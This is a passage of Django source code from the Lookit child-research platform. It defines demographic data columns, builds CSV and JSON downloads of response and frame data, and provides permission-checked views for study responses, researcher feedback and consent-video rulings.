        id="demographic__hashed_id",
        description=(
            "Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
            "so may vary within the same participant across responses."
        ),
        extractor=lambda resp: hash_demographic_id(resp),
        name="Demographic ID",
    ),
    ResponseDataColumn(
        id="demographic__date_created",
        description=(
            "Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
            "2019-10-02 21:39:03.713283+00:00"
        ),
        extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
        name="Date created",
    ),
    ResponseDataColumn(
        id="demographic__number_of_children",
        description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
        extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
        name="Number of children",
    ),
    ResponseDataColumn(
        id="demographic__child_rounded_ages",
        description=(
            "List of rounded ages based on child birthdays entered in demographic form (not based on children "
            "registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
            "under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
        ),
        extractor=lambda resp: round_ages_from_birthdays(
            resp["demographic_snapshot__child_birthdays"], resp["date_created"]
        ),
        name="Child ages rounded",
    ),
    ResponseDataColumn(
        id="demographic__languages_spoken_at_home",
        description="Freeform response to 'What language(s) does your family speak at home?'",
        extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
        name="Languages spoken at home",
    ),
    ResponseDataColumn(
        id="demographic__number_of_guardians",
        description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
        extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
        name="Number of guardians",
    ),
    ResponseDataColumn(
        id="demographic__number_of_guardians_explanation",
        description=(
            "Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
            "enter the number of parents/guardians your children are usually living with or explain.'"
        ),
        extractor=lambda resp: resp[
            "demographic_snapshot__number_of_guardians_explanation"
        ],
        name="Number of guardians explanation",
    ),
    ResponseDataColumn(
        id="demographic__race_identification",
        description=(
            "Comma-separated list of all values checked for question 'What category(ies) does your family "
            "identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
            "Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
            "Other Pacific Islander; Another race, ethnicity, or origin"
        ),
        extractor=lambda resp: resp["demographic_snapshot__race_identification"],
        name="Race",
    ),
    ResponseDataColumn(
        id="demographic__parent_age",
        description=(
            "Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
            "35-39, 40-44, 45-49, 50s, 60s, >70"
        ),
        extractor=lambda resp: resp["demographic_snapshot__age"],
        name="Parent age",
    ),
    ResponseDataColumn(
        id="demographic__parent_gender",
        description=(
            "Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
            "[other], na [prefer not to answer]"
        ),
        extractor=lambda resp: resp["demographic_snapshot__gender"],
        # Fix: display name previously read "Parent age" (copy-paste error).
        name="Parent gender",
    ),
    ResponseDataColumn(
        id="demographic__education_level",
        description=(
            "Parent's response to question 'What is the highest level of education you've completed?'; options "
            "are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
            "college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
            "graduate or professional school], prof [graduate or professional degree]"
        ),
        extractor=lambda resp: resp["demographic_snapshot__education_level"],
        name="Parent education level",
    ),
    ResponseDataColumn(
        id="demographic__spouse_education_level",
        description=(
            "Parent's response to question 'What is the highest level of education your spouse has "
            "completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
            "col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
            "grad [some or attending graduate or professional school], prof [graduate or professional degree], "
            "na [not applicable - no spouse or partner]"
        ),
        extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
        # Fix: display name previously read "Parent education level" (copy-paste error).
        name="Spouse education level",
    ),
    ResponseDataColumn(
        id="demographic__annual_income",
        description=(
            "Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
            "options are 0, 5000, 10000, 15000, 20000-190000 in increments of 10000, >200000, or na [prefer not "
            "to answer]"
        ),
        extractor=lambda resp: resp["demographic_snapshot__annual_income"],
        name="Annual income",
    ),
    ResponseDataColumn(
        id="demographic__number_of_books",
        description="Parent's response to question 'About how many children's books are there in your home?'; integer",
        extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
        name="Number of books",
    ),
    ResponseDataColumn(
        id="demographic__additional_comments",
        description="Parent's freeform response to question 'Anything else you'd like us to know?'",
        extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
        name="Additional comments",
    ),
    ResponseDataColumn(
        id="demographic__country",
        description="Parent's response to question 'What country do you live in?'; 2-letter country code",
        extractor=lambda resp: resp["demographic_snapshot__country"],
        name="Country code",
    ),
    ResponseDataColumn(
        id="demographic__state",
        description=(
            "Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
            "abbreviation"
        ),
        extractor=lambda resp: resp["demographic_snapshot__state"],
        name="US State",
    ),
    ResponseDataColumn(
        id="demographic__density",
        description=(
            "Parent's response to question 'How would you describe the area where you live?'; options are "
            "urban, suburban, rural"
        ),
        extractor=lambda resp: resp["demographic_snapshot__density"],
        name="Density",
    ),
    ResponseDataColumn(
        id="demographic__lookit_referrer",
        description="Parent's freeform response to question 'How did you hear about Lookit?'",
        extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
        name="How you heard about Lookit",
    ),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
    col.id
    for col in RESPONSE_COLUMNS
    # str.startswith accepts a tuple of prefixes; one call covers both groups
    if col.id.startswith(("child__", "participant__"))
]

# Response-column ids whose values are identifiable; used for filename signaling
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
    selected_header_ids: Union[Set, List],
    all_available_header_ids: Union[Set, KeysView],
) -> List:
    """Assemble the ordered header list for a response data download.

    Args:
        selected_header_ids: ids of optional headers to include (matching id values
            in RESPONSE_COLUMNS). Optional columns not listed here are omitted.
        all_available_header_ids: every header id present in the data. Ids not
            covered by RESPONSE_COLUMNS are appended at the end.

    Returns:
        Ordered header list:
        1) RESPONSE_COLUMNS ids in declaration order, minus unselected optional ones
           (the final two columns, sequence/conditions, are excluded -- they get
           special expansion elsewhere);
        2) any remaining ids from all_available_header_ids, alphabetically.
    """
    skipped_optional_ids = {
        column.id
        for column in RESPONSE_COLUMNS
        if column.optional and column.id not in selected_header_ids
    }
    standard_ids = [
        column.id
        for column in RESPONSE_COLUMNS[0:-2]
        if column.id not in skipped_optional_ids
    ]
    leftover_ids = (
        set(all_available_header_ids) - set(standard_ids) - skipped_optional_ids
    )
    return standard_ids + sorted(leftover_ids)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
    """Assemble the ordered header list for a demographic data download.

    Args:
        selected_header_ids(set or list): ids of optional headers to include
            (matching id values in DEMOGRAPHIC_COLUMNS); None means none selected.

    Returns:
        DEMOGRAPHIC_COLUMNS ids in declaration order, keeping every required
        column and only those optional columns listed in selected_header_ids.
    """
    included = {} if selected_header_ids is None else selected_header_ids
    headers = []
    for column in DEMOGRAPHIC_COLUMNS:
        if not column.optional or column.id in included:
            headers.append(column.id)
    return headers
def construct_response_dictionary(
    resp, columns, optional_headers, include_exp_data=True
):
    """Build a (possibly nested) dict of response data for JSON-style output.

    Column ids of the form "group__field" become resp_dict["group"]["field"];
    ids without exactly one "__" separator are stored flat under the full id.
    Optional columns are included only when listed in optional_headers.

    Args:
        resp: response (instance or dict) passed to each column's extractor.
        columns: iterable of ResponseDataColumn-like objects.
        optional_headers: collection of optional column ids to include; None
            is treated as empty.
        include_exp_data: whether to attach resp.exp_data under "exp_data".

    Returns:
        Dict of extracted values, nested one level by id prefix where possible.
    """
    selected = {} if optional_headers is None else optional_headers
    response_dict = {}
    for column in columns:
        if column.optional and column.id not in selected:
            continue
        try:
            group_name, field_name = column.id.split("__")
            response_dict.setdefault(group_name, {})[field_name] = column.extractor(
                resp
            )
        except ValueError:
            # id did not split into exactly two parts: store under the full id
            response_dict[column.id] = column.extractor(resp)
    if include_exp_data:
        response_dict["exp_data"] = resp.exp_data
    return response_dict
class FrameDataRow(NamedTuple):
    """One key/value datum extracted from a response's exp_data or global event timings.

    Field meanings are documented in FRAME_DATA_HEADER_DESCRIPTIONS.
    """

    response_uuid: str
    child_hashed_id: str
    frame_id: str
    event_number: str
    key: str
    value: str
# Human-readable descriptions of the FrameDataRow fields, written into the
# frame-data dictionary CSV (see build_framedata_dict_csv).
FRAME_DATA_HEADER_DESCRIPTIONS = {
    "response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
    "child_hashed_id": (
        "Hashed identifier for the child associated with this response; can be matched to summary data "
        "child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
        "need to match children across multiple studies, use the child_global_id."
    ),
    "frame_id": (
        "Identifier for the particular frame responsible for this data; matches up to an element in the "
        "response_sequence in the summary data file"
    ),
    "event_number": (
        "Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
        "frame (and within global data) within each response. Blank for non-event data."
    ),
    "key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
    "value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
    """Get list of data stored in response's exp_data and global_event_timings fields.

    Args:
        resp(Response or dict): response data to process. If dict, must contain fields
        child__uuid, study__uuid, study__salt, study__hash_digits, uuid, exp_data, and
        global_event_timings.

    Returns:
        List of FrameDataRows each representing a single piece of data from global_event_timings or
        exp_data. Descriptions of each field of the FrameDataRow are given in FRAME_DATA_HEADER_DESCRIPTIONS.
    """
    # Normalize a Response instance to the dict form so extraction below has a
    # single code path. (isinstance is the idiomatic type check; Response is not
    # a dict subclass, so behavior matches the original `type(...) is dict`.)
    if not isinstance(resp, dict):
        resp = {
            "child__uuid": resp.child.uuid,
            "study__uuid": resp.study.uuid,
            "study__salt": resp.study.salt,
            "study__hash_digits": resp.study.hash_digits,
            "uuid": resp.uuid,
            "exp_data": resp.exp_data,
            "global_event_timings": resp.global_event_timings,
        }

    frame_data_tuples = []
    child_hashed_id = hash_id(
        resp["child__uuid"],
        resp["study__uuid"],
        resp["study__salt"],
        resp["study__hash_digits"],
    )
    # Hoisted: the stringified response UUID is identical for every row.
    response_uuid = str(resp["uuid"])

    # First add all of the global event timings as events with frame_id "global"
    for event_index, event in enumerate(resp["global_event_timings"]):
        for key, value in event.items():
            frame_data_tuples.append(
                FrameDataRow(
                    child_hashed_id=child_hashed_id,
                    response_uuid=response_uuid,
                    frame_id="global",
                    key=key,
                    event_number=str(event_index),
                    value=value,
                )
            )

    # Next add all data in exp_data
    event_prefix = "eventTimings."
    for frame_id, frame_data in resp["exp_data"].items():
        for key, value in flatten_dict(frame_data).items():
            # Process event data separately and include event_number within frame
            if key.startswith(event_prefix):
                key_pieces = key.split(".")
                frame_data_tuples.append(
                    FrameDataRow(
                        child_hashed_id=child_hashed_id,
                        response_uuid=response_uuid,
                        frame_id=frame_id,
                        key=".".join(key_pieces[2:]),
                        event_number=str(key_pieces[1]),
                        value=value,
                    )
                )
            # omit frameType values from CSV
            elif key == "frameType":
                continue
            # Omit the DOB from any exit survey
            elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
                continue
            # Omit empty generatedProperties values from CSV
            elif key == "generatedProperties" and not value:
                continue
            # For all other data, create a regular entry with frame_id and no event #
            else:
                frame_data_tuples.append(
                    FrameDataRow(
                        child_hashed_id=child_hashed_id,
                        response_uuid=response_uuid,
                        frame_id=frame_id,
                        key=key,
                        event_number="",
                        value=value,
                    )
                )

    return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
    """Write a frame-data "data dictionary" CSV documenting the given responses.

    Scans every response's frame data to collect which frame ids, per-frame keys,
    and event keys actually occur, then writes one row per high-level header,
    per frame, per key, and per event key -- using stock descriptions where
    available and RESEARCHER: INSERT... placeholders otherwise.

    Args:
        writer: DictWriter-style object; rows written here use the keys
            'column', 'description', 'possible_frame_id', 'frame_description',
            'possible_key', and 'key_description' (assumes the writer's
            fieldnames cover these -- confirm against caller).
        responses: queryset/sequence of responses; paginated to bound memory use.
    """
    response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
    # Accumulators across all pages:
    unique_frame_ids = set()  # frame id suffixes (portion after the first "-")
    event_keys = set()  # keys seen in event rows (nonempty event_number)
    unique_frame_keys_dict = {}  # frame id suffix -> set of non-event keys seen
    for page_num in response_paginator.page_range:
        page_of_responses = response_paginator.page(page_num)
        for resp in page_of_responses:
            this_resp_data = get_frame_data(resp)
            # Strip the leading "N-" sequence index so frames of the same type
            # collapse to one dictionary entry; skip the synthetic "global" frame.
            these_ids = {
                d.frame_id.partition("-")[2]
                for d in this_resp_data
                if not d.frame_id == "global"
            }
            event_keys = event_keys | {
                d.key for d in this_resp_data if d.event_number != ""
            }
            unique_frame_ids = unique_frame_ids | these_ids
            for frame_id in these_ids:
                these_keys = {
                    d.key
                    for d in this_resp_data
                    if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
                }
                if frame_id in unique_frame_keys_dict:
                    unique_frame_keys_dict[frame_id] = (
                        unique_frame_keys_dict[frame_id] | these_keys
                    )
                else:
                    unique_frame_keys_dict[frame_id] = these_keys

    # Start with general descriptions of high-level headers (child_id, response_id, etc.)
    writer.writerows(
        [
            {"column": header, "description": description}
            for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
        ]
    )
    writer.writerow(
        {
            "possible_frame_id": "global",
            "frame_description": "Data not associated with a particular frame",
        }
    )

    # Add placeholders to describe each frame type
    unique_frame_ids = sorted(list(unique_frame_ids))
    for frame_id in unique_frame_ids:
        writer.writerow(
            {
                "possible_frame_id": "*-" + frame_id,
                "frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
            }
        )
        unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
        for k in unique_frame_keys:
            writer.writerow(
                {
                    "possible_frame_id": "*-" + frame_id,
                    "possible_key": k,
                    "key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
                }
            )

    # Finally, describe event keys: use stock descriptions for keys every
    # recording-capable frame emits, placeholders for study-specific ones.
    event_keys = sorted(list(event_keys))
    event_key_stock_descriptions = {
        "eventType": (
            "Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
            "cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
            "or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
            "find a list of events recorded by each frame in the frame documentation at "
            "https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
        ),
        "exitType": (
            "Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
        ),
        "lastPageSeen": (
            "Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
        ),
        "pipeId": (
            "Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
            "useful for troubleshooting in rare cases."
        ),
        "streamTime": (
            "Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
            "video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
        ),
        "timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
        "videoId": (
            "Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
            "currently being recorded."
        ),
    }
    for k in event_keys:
        writer.writerow(
            {
                "possible_frame_id": "any (event data)",
                "possible_key": k,
                "key_description": event_key_stock_descriptions.get(
                    k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
                ),
            }
        )
def build_single_response_framedata_csv(response):
    """Return CSV file contents (string) of frame-level data for one response.

    Used both when building the zip archive of all response data and for the
    individual-file downloads on the individual responses view.
    """
    output, writer = csv_namedtuple_writer(FrameDataRow)
    writer.writerows(get_frame_data(response))
    return output.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin providing the paginated, permission-filtered response queryset for downloads."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        """Return this study's responses visible to the requesting researcher, ordered."""
        return self.study.responses_for_researcher(self.request.user).order_by(
            self.get_ordering()
        )
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin providing response rows (as value dicts) for demographic downloads."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        """Return ordered response rows as dicts of the fields demographic columns need."""
        responses = self.study.responses_for_researcher(self.request.user)
        responses = responses.order_by(self.get_ordering())
        responses = responses.select_related(
            "child", "child__user", "study", "demographic_snapshot"
        )
        return responses.values(
            "uuid",
            "date_created",
            "child__user__uuid",
            "study__uuid",
            "study__salt",
            "study__hash_digits",
            "demographic_snapshot__uuid",
            "demographic_snapshot__created_at",
            "demographic_snapshot__number_of_children",
            "demographic_snapshot__child_birthdays",
            "demographic_snapshot__languages_spoken_at_home",
            "demographic_snapshot__number_of_guardians",
            "demographic_snapshot__number_of_guardians_explanation",
            "demographic_snapshot__race_identification",
            "demographic_snapshot__age",
            "demographic_snapshot__gender",
            "demographic_snapshot__education_level",
            "demographic_snapshot__spouse_education_level",
            "demographic_snapshot__annual_income",
            "demographic_snapshot__number_of_books",
            "demographic_snapshot__additional_comments",
            "demographic_snapshot__country",
            "demographic_snapshot__state",
            "demographic_snapshot__density",
            "demographic_snapshot__lookit_referrer",
            "demographic_snapshot__extra",
        )
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
    """
    View to display a list of study responses.
    """
    template_name = "studies/study_responses.html"
    def get_ordering(self):
        """
        Determine sort field and order. Sorting on id actually sorts on child id, not response id.
        Sorting on status, actually sorts on 'completed' field, where we are alphabetizing
        "in progress" and "completed"
        """
        orderby = self.request.GET.get("sort", "id")
        return orderby.replace("id", "child__id").replace("status", "completed")
    def get_queryset(self):
        """Prefetch consent rulings (with arbiter) and feedback (newest first) so the
        template can render them without per-response queries."""
        return (
            super()
            .get_queryset()
            .prefetch_related(
                "consent_rulings__arbiter",
                Prefetch(
                    "feedback",
                    queryset=Feedback.objects.select_related("researcher").order_by(
                        "-id"
                    ),
                ),
            )
        )
    def get_context_data(self, **kwargs):
        """
        In addition to the study, adds several items to the context dictionary. Study results
        are paginated.
        """
        context = super().get_context_data(**kwargs)
        context["study"] = study = self.study
        paginated_responses = context["object_list"]
        columns_included_in_summary = study.columns_included_in_summary()
        # Fixed subset of RESPONSE_COLUMNS shown in the main response table.
        columns_included_in_table = [
            "child__hashed_id",
            "response__uuid",
            "response__id",
            "response__status",
            "response__completed",
            "response__is_preview",
        ]
        response_data = []
        for resp in paginated_responses:
            # Info needed for table display of individual responses
            this_resp_data = {
                col.id: col.extractor(resp)
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_table
            }
            # Exception - store actual date object for date created
            this_resp_data["response__date_created"] = resp.date_created
            # info needed for summary table shown at right
            this_resp_data["summary"] = [
                {
                    "name": col.name,
                    "value": col.extractor(resp),
                    "description": col.description,
                }
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_summary
            ]
            this_resp_data["videos"] = resp.videos.values("pk", "full_name")
            # Elide the study/response UUID segments of video filenames for display.
            for v in this_resp_data["videos"]:
                v["display_name"] = (
                    v["full_name"]
                    .replace("videoStream_{}_".format(study.uuid), "...")
                    .replace("_{}_".format(resp.uuid), "...")
                )
            response_data.append(this_resp_data)
        context["response_data"] = response_data
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        context["can_edit_feedback"] = self.request.user.has_study_perms(
            StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
        )
        return context
    def build_video_display_name(self, study_uuid, response_uuid, vid_name):
        """
        Strips study_uuid and response_uuid out of video responses titles for better display.
        NOTE(review): get_context_data builds display names inline with str.replace
        rather than calling this helper; it appears unused within this class.
        """
        return ". . ." + ". . .".join(
            vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
        )
class StudySingleResponseDownload(ResponseDownloadMixin, View):
    """
    Download a single study response in the selected format with selected headers.
    """
    def get(self, *args, **kwargs):
        """Serve one response as JSON, summary CSV, or frame-data CSV.
        Raises SuspiciousOperation (HTTP 400) for an unknown data type or a
        response id outside this researcher's visible queryset."""
        data_type = self.request.GET.get("data-type-selector", None)
        if data_type not in ["json", "csv", "framedata"]:
            raise SuspiciousOperation
        response_id = self.request.GET.get("response_id", None)
        try:
            resp = self.get_queryset().get(pk=response_id)
        except ObjectDoesNotExist:
            raise SuspiciousOperation
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        extension = "json" if data_type == "json" else "csv"
        # Suffix "_identifiable" when any requested optional column is identifying.
        filename = "{}_{}{}.{}".format(
            study_name_for_files(study.name),
            str(resp.uuid),
            "_frames"
            if data_type == "json"
            else "_identifiable"
            if IDENTIFIABLE_DATA_HEADERS & header_options
            else "",
            extension,
        )
        if data_type == "json":
            cleaned_data = json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",
                default=str,
            )
        elif data_type == "csv":
            row_data = flatten_dict(
                {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
            )
            header_list = get_response_headers(header_options, row_data.keys())
            output, writer = csv_dict_output_and_writer(header_list)
            writer.writerow(row_data)
            cleaned_data = output.getvalue()
        elif data_type == "framedata":
            cleaned_data = build_single_response_framedata_csv(resp)
        else:
            # Unreachable: data_type was validated above; kept as a defensive guard.
            raise SuspiciousOperation
        response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponseVideoAttachment(
    ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
    """
    View that redirects to a requested video for a study response.
    """
    raise_exception = True
    @cached_property
    def video(self):
        # Only select the video from consented videos for this study
        return self.study.videos_for_consented_responses.get(
            pk=self.kwargs.get("video")
        )
    def can_view_this_video(self):
        """Permission check: researcher needs response-data perms for real data,
        or preview-data perms when the video belongs to a preview response."""
        user = self.request.user
        study = self.study
        video = self.video
        return user.is_researcher and (
            (
                user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
                and not video.response.is_preview
            )
            or (
                user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
                and video.response.is_preview
            )
        )
    test_func = can_view_this_video
    def get(self, request, *args, **kwargs):
        """Redirect to the video's download URL, or, with ?mode=download, fetch the
        bytes server-side and serve them as an attachment."""
        video = self.video
        download_url = video.download_url
        if self.request.GET.get("mode") == "download":
            # Whole video is buffered in memory before being returned.
            # NOTE(review): File.open is called unbound with a BytesIO as `self`;
            # verify this is intended rather than File(io.BytesIO(r.content)).
            r = requests.get(download_url)
            response = FileResponse(
                File.open(io.BytesIO(r.content)),
                filename=video.filename,
                as_attachment=True,
            )
            return response
        return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
    """
    View to create or edit response feedback.
    """

    def user_can_edit_feedback(self):
        """Permission test for posting feedback.

        Requires the user to be a researcher holding EDIT_STUDY_FEEDBACK on this
        study, and any feedback_id/response_id in the POST to belong to this study.
        Returns True/False for UserPassesTestMixin.
        """
        user = self.request.user
        study = self.study
        # First check user has permission to be editing feedback from this study at all.
        # BUG FIX: this previously read `if not user.is_researcher and user.has_study_perms(...)`,
        # which (by operator precedence) denied only non-researchers who somehow held the
        # permission and let everyone else through. Both conditions must hold.
        if not (
            user.is_researcher
            and user.has_study_perms(StudyPermission.EDIT_STUDY_FEEDBACK, study)
        ):
            return False
        # Check that the feedback_id (if given) is from this study.
        feedback_id = self.request.POST.get("feedback_id", None)
        if feedback_id:
            try:
                feedback = Feedback.objects.get(id=feedback_id)
            except (ObjectDoesNotExist, ValueError):
                # ValueError: non-numeric id should deny access, not raise a 500.
                return False
            if feedback.response.study_id != study.pk:
                return False
        # Check that the response_id (if given) is from this study.
        response_id = self.request.POST.get("response_id", None)
        if response_id:
            try:
                response = Response.objects.get(id=int(response_id))
            except (ObjectDoesNotExist, ValueError):
                return False
            if response.study_id != study.pk:
                return False
        return True

    test_func = user_can_edit_feedback

    def post(self, request, *args, **kwargs):
        """
        Create or edit feedback. Pass feedback_id to edit existing feedback, or response_id to create new
        feedback for that response.
        """
        form_data = self.request.POST
        user = self.request.user
        study = self.study
        feedback_id = form_data.get("feedback_id", None)
        comment = form_data.get("comment", "")
        if feedback_id:
            # Edit existing feedback in place.
            Feedback.objects.filter(id=feedback_id).update(comment=comment)
        else:
            # Create new feedback authored by the requesting researcher.
            # response_id was validated as numeric and in-study by user_can_edit_feedback.
            response_id = int(form_data.get("response_id"))
            Feedback.objects.create(
                response_id=response_id, researcher=user, comment=comment
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
        )
class StudyResponsesConsentManager(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    generic.DetailView,
):
    """Manage consent videos from here: approve or reject as evidence of informed consent."""
    template_name = "studies/study_responses_consent_ruling.html"
    queryset = Study.objects.all()
    raise_exception = True
    def user_can_code_consent(self):
        """Permission check: researcher with consent-coding permission for either
        actual or preview data on this study."""
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and (
            user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
            or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
        )
    test_func = user_can_code_consent
    def get_context_data(self, **kwargs):
        """Adds responses (with current rulings and videos), consent statistics,
        and a JSON key/value store of per-response details for the template's JS."""
        context = super().get_context_data(**kwargs)
        # Need to prefetch our responses with consent-footage videos.
        study = context["study"]
        # TODO: technically should not grant access to consent videos for preview data unless has that perm
        # (or should clearly indicate that code_study_consent means preview + actual data)
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        responses = get_responses_with_current_rulings_and_videos(
            study.id, preview_only
        )
        context["loaded_responses"] = responses
        context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
        # Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
        # data-* properties in HTML
        response_key_value_store = {}
        # Paginate to bound memory while building the k/v store.
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            # two jobs - generate statistics and populate k/v store.
            for response in page_of_responses:
                # Keyed by response UUID; fields are pop()ed off the response dict
                # as they are moved into the store.
                response_json = response_key_value_store[str(response["uuid"])] = {}
                response["uuid"] = str(response.pop("uuid"))
                response_json["videos"] = response.pop("videos")
                response_json["details"] = {
                    "general": {
                        "uuid": response["uuid"],
                        "global_event_timings": json.dumps(
                            response.pop("global_event_timings")
                        ),
                        "sequence": json.dumps(response.pop("sequence")),
                        "completed": json.dumps(response.pop("completed")),
                        "date_created": str(response["date_created"]),
                    },
                    "participant": {
                        "hashed_id": hash_participant_id(response),
                        "uuid": str(response.pop("child__user__uuid")),
                        "nickname": response.pop("child__user__nickname"),
                    },
                    "child": {
                        "hashed_id": hash_child_id(response),
                        "uuid": str(response.pop("child__uuid")),
                        "name": response.pop("child__given_name"),
                        "birthday": str(response.pop("child__birthday")),
                        "gender": response.pop("child__gender"),
                        "additional_information": response.pop(
                            "child__additional_information"
                        ),
                    },
                }
        # TODO: Use json_script template tag to create JSON that can be used in Javascript
        # (see https://docs.djangoproject.com/en/3.0/ref/templates/builtins/#json-script)
        context["response_key_value_store"] = json.dumps(response_key_value_store)
        return context
    def post(self, request, *args, **kwargs):
        """This is where consent rulings are submitted."""
        form_data = self.request.POST
        user = self.request.user
        study = self.get_object()
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        # Only allow any action on preview responses unless full perms
        responses = study.responses
        if preview_only:
            responses = responses.filter(is_preview=True)
        comments = json.loads(form_data.get("comments"))
        # We now accept pending rulings to reverse old reject/approve decisions.
        for ruling in ("accepted", "rejected", "pending"):
            judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
            for response in judged_responses:
                response.consent_rulings.create(
                    action=ruling,
                    arbiter=user,
                    comments=comments.pop(str(response.uuid), None),
                )
                # Save the response to trigger any updates tied to its save hooks.
                response.save()
        # if there are any comments left over, these will count as new rulings that are the same as the last.
        if comments:
            for resp_uuid, comment in comments.items():
                response = responses.get(uuid=resp_uuid)
                response.consent_rulings.create(
                    action=response.most_recent_ruling, arbiter=user, comments=comment
                )
        return HttpResponseRedirect(
            reverse(
                "exp:study-responses-consent-manager",
                kwargs=dict(pk=self.get_object().pk),
            )
        )
    def get(self, request, *args, **kwargs):
        # External studies have no Lookit-hosted consent footage to review.
        if self.get_object().study_type.is_external:
            messages.error(request, "There is no consent manager for external studies.")
            return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
        else:
            return super().get(request, *args, **kwargs)
class StudyResponsesAll(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """
    StudyResponsesAll shows a variety of download options for response and child data
    from a given study. (It does not actually show any data.)
    """

    template_name = "studies/study_responses_all.html"
    queryset = Study.objects.all()
    http_method_names = ["get"]

    def get_context_data(self, **kwargs):
        """
        In addition to the study, adds several items to the context dictionary.
        """
        context = super().get_context_data(**kwargs)
        user = self.request.user
        study = context["study"]
